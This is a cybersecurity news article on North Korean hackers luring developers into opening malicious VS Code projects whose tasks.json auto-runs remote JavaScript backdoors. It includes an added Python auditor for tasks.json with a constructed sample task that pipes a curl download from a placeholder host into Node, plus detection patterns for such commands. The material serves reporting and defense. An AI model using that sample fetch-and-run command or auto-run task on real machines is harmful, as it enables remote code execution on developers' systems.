North Korean Hackers Attack Devs via Malicious VS Code Projects
“Recently, developers are being targeted by North Korean hackers through malicious VS Code projects.”
Malicious Microsoft Visual Studio Code (VS Code) projects have been observed being used as lures by North Korean threat actors connected to the ongoing Contagious Interview campaign in order to install a backdoor on compromised endpoints.
Jamf Threat Labs
The most recent discovery shows how the new strategy, which was initially identified in December 2025, is still evolving.
“The ongoing development of DPRK-affiliated threat actors is demonstrated by this activity, as they constantly modify their distribution methods and tooling to comply with genuine developer workflows. The misuse of Node.js execution and Visual Studio Code task configuration files shows how these methods are still evolving alongside widely used development tools.”
Thijs Xhaflaire, Security Researcher, Report
“In this action, a backdoor implant that enables remote code execution on the victim system was deployed.”
“Visual Studio Code asks the user to trust the repository creator when they launch the project. The repository’s tasks.json configuration file is automatically processed by the application if that trust is approved, which may cause embedded arbitrary commands to be run on the system. This causes a background shell command to run on macOS systems, which retrieves a JavaScript payload remotely and pipes it straight into the Node.js runtime using nohup bash -c and curl -s. This suppresses all command output while enabling independent execution in the event that the Visual Studio Code process is terminated.”

The attack, first disclosed by OpenSourceMalware last month, essentially involves instructing potential targets to clone a repository on GitHub, GitLab, or Bitbucket and open the project in Visual Studio Code as part of a purported job assessment.
Depending on the operating system of the compromised machine, the ultimate objective of these efforts is to abuse VS Code task configuration files to run malicious payloads hosted on Vercel domains. By using the “runOn: folderOpen” option, the task is configured to run each time that file or any other file in the project folder is opened in Visual Studio Code. This eventually leads to the deployment of BeaverTail and InvisibleFerret.
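As an added example that is not part of the original article or of Jamf's research, the following Python script audits a cloned repository's .vscode/tasks.json before the folder is trusted in VS Code. It flags tasks that carry the “runOn: folderOpen” auto-run option and shell commands that fetch remote content and pipe it into an interpreter or detach with nohup, the two traits described above. The sample tasks.json, the URL in it, and the indicator patterns are constructed for illustration; they are generic heuristics, not Jamf's detection signatures.

```python
# Added example (not from the article or Jamf): audit a repo's
# .vscode/tasks.json before trusting the folder in VS Code.
import json
import re
from pathlib import Path

# Generic heuristics for the traits described in the article; these are
# illustrative patterns, not Jamf's detection signatures.
SUSPICIOUS_PATTERNS = {
    "remote_fetch_piped_to_interpreter": re.compile(
        r"\b(curl|wget)\b[^|;&]*\|\s*(node|bash|sh|zsh|python3?)\b"),
    "detached_execution": re.compile(r"\bnohup\b"),
    "base64_decode": re.compile(r"\bbase64\s+(-d|--decode)\b"),
}

def strip_jsonc(text: str) -> str:
    """Remove // and /* */ comments that sit outside string literals,
    so a URL such as https://... inside a command is left intact."""
    out, i, n, in_str = [], 0, len(text), False
    while i < n:
        c = text[i]
        if in_str:
            out.append(c)
            if c == "\\" and i + 1 < n:      # keep escaped char verbatim
                out.append(text[i + 1])
                i += 2
                continue
            if c == '"':
                in_str = False
            i += 1
        elif c == '"':
            in_str = True
            out.append(c)
            i += 1
        elif text.startswith("//", i):
            j = text.find("\n", i)
            i = n if j == -1 else j
        elif text.startswith("/*", i):
            j = text.find("*/", i + 2)
            i = n if j == -1 else j + 2
        else:
            out.append(c)
            i += 1
    return "".join(out)

def load_jsonc(text: str) -> dict:
    """Parse VS Code-style JSON with comments and trailing commas."""
    cleaned = re.sub(r",\s*([}\]])", r"\1", strip_jsonc(text))
    return json.loads(cleaned)

def command_string(task: dict) -> str:
    """Flatten command and args, including per-OS overrides, into one string."""
    parts = []
    for scope in (task, task.get("osx", {}), task.get("linux", {}), task.get("windows", {})):
        if isinstance(scope.get("command"), str):
            parts.append(scope["command"])
        for arg in scope.get("args", []):
            parts.append(arg if isinstance(arg, str) else str(arg.get("value", "")))
    return " ".join(parts)

def audit_tasks(config: dict) -> list:
    """Return one finding per task that auto-runs on folder open or matches a pattern."""
    findings = []
    for task in config.get("tasks", []):
        auto_run = task.get("runOptions", {}).get("runOn") == "folderOpen"
        cmd = command_string(task)
        hits = [name for name, pat in SUSPICIOUS_PATTERNS.items() if pat.search(cmd)]
        if auto_run or hits:
            findings.append({"label": task.get("label", "<unnamed>"),
                             "auto_run": auto_run, "indicators": hits, "command": cmd})
    return findings

def audit_repo(repo: Path) -> list:
    """Audit <repo>/.vscode/tasks.json; a missing file yields no findings."""
    path = repo / ".vscode" / "tasks.json"
    return audit_tasks(load_jsonc(path.read_text(encoding="utf-8"))) if path.is_file() else []

# Constructed sample in the shape the article describes; the URL is a placeholder.
SAMPLE_TASKS_JSON = r'''{
  // version comment, as VS Code permits in tasks.json
  "version": "2.0.0",
  "tasks": [
    {"label": "Install dependencies", "type": "shell", "command": "npm install",
     "runOptions": {"runOn": "folderOpen"},},
    {"label": "Check region", "type": "shell",
     "command": "nohup bash -c 'curl -s https://example.invalid/p.js | node' >/dev/null 2>&1 &",
     "runOptions": {"runOn": "folderOpen"}},
    {"label": "Run tests", "type": "shell", "command": "npm test"}
  ]
}'''

if __name__ == "__main__":
    for finding in audit_tasks(load_jsonc(SAMPLE_TASKS_JSON)):
        print(finding)
```

Run it against a freshly cloned repository with `audit_repo(Path("path/to/clone"))` before clicking “trust” in VS Code; any task that auto-runs on folder open deserves a manual look even when no command indicator fires, because a benign-looking `npm install` can still pull in a malicious dependency, as the article's later sections describe.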
Later versions of the campaign have been found to hide complex multi-stage droppers in task configuration files, disguising the malware as benign spell-check dictionaries as a fallback in case the task fails to retrieve the payload from the Vercel domain.
As before, the obfuscated JavaScript bundled with these files is executed when the victim opens the project in the integrated development environment (IDE). It connects to a remote server (“ip-regions-check.vercel[.]app”) and runs whatever JavaScript code it receives. The attack’s final phase uses another heavily obfuscated JavaScript payload.
According to Jamf, the threat actors used a previously unreported infection technique to deploy a backdoor that allows remote code execution on the infected machine, marking yet another shift in this campaign. As in earlier iterations, the attack chain begins when the victim uses Visual Studio Code to clone and open a rogue Git repository.
The JavaScript payload, hosted on Vercel, contains the primary backdoor functionality: it creates a persistent execution loop that gathers basic host data and communicates with a remote server to enable remote code execution, system fingerprinting, and continuous communication.
In one instance, the Apple device management company reported observing additional JavaScript instructions being executed approximately eight minutes after the initial infection. The newly downloaded JavaScript is designed to run further JavaScript, beacon to the server every five seconds, and remove evidence of its activity when it receives a signal from the operator. The inline comments and language in the source code raise the possibility that the script was created with an artificial intelligence (AI) tool.
Threat actors tied to the Democratic People’s Republic of Korea (DPRK) are known to target software engineers, especially those employed in the cryptocurrency, blockchain, and fintech industries, because they frequently have privileged access to financial assets, digital wallets, and technical infrastructure.

If their accounts and systems are compromised, attackers may gain unauthorized access to source code, intellectual property, internal systems, and digital assets. These constant adjustments to their tactics are seen as an attempt to increase the effectiveness of their cyber espionage and financial operations in support of the heavily sanctioned regime.
The development coincides with Red Asgard’s analysis of a malicious repository found to use a VS Code task configuration to retrieve obfuscated JavaScript designed to drop an XMRig bitcoin miner and a full-featured backdoor called Tsunami (also known as TsunamiKit).
According to another analysis from Security Alliance last week that detailed the campaign’s abuse of VS Code tasks, an unidentified victim was contacted on LinkedIn by threat actors posing as the chief technology officer of a project named Meta2140. The threat actors shared a Notion[.]so link containing a technical assessment and a URL to a Bitbucket repository hosting the malicious code.
Interestingly, the attack chain is designed to fall back on two different approaches: installing a malicious npm dependency called “grayavatar” or executing JavaScript code that retrieves a sophisticated Node.js controller. This controller then runs five different modules to log keystrokes, take screenshots, scan the system’s home directory for sensitive files, replace wallet addresses copied to the clipboard, harvest credentials from web browsers, and create a persistent connection to a remote server.
The malware then uses a stager script to set up a parallel Python environment that supports keylogging, data collection, XMRig bitcoin mining, and AnyDesk deployment for remote access. Notably, the Python and Node.js layers are called InvisibleFerret and BeaverTail, respectively.
These results suggest that the state-sponsored actors are simultaneously experimenting with various delivery mechanisms to boost the probability that their attacks will be successful.
About The Author
Suraj Koli is a content specialist in technical writing about cybersecurity and information security. He has written many articles on cybersecurity concepts, covering the latest trends in cyber awareness and ethical hacking. Find out more about him.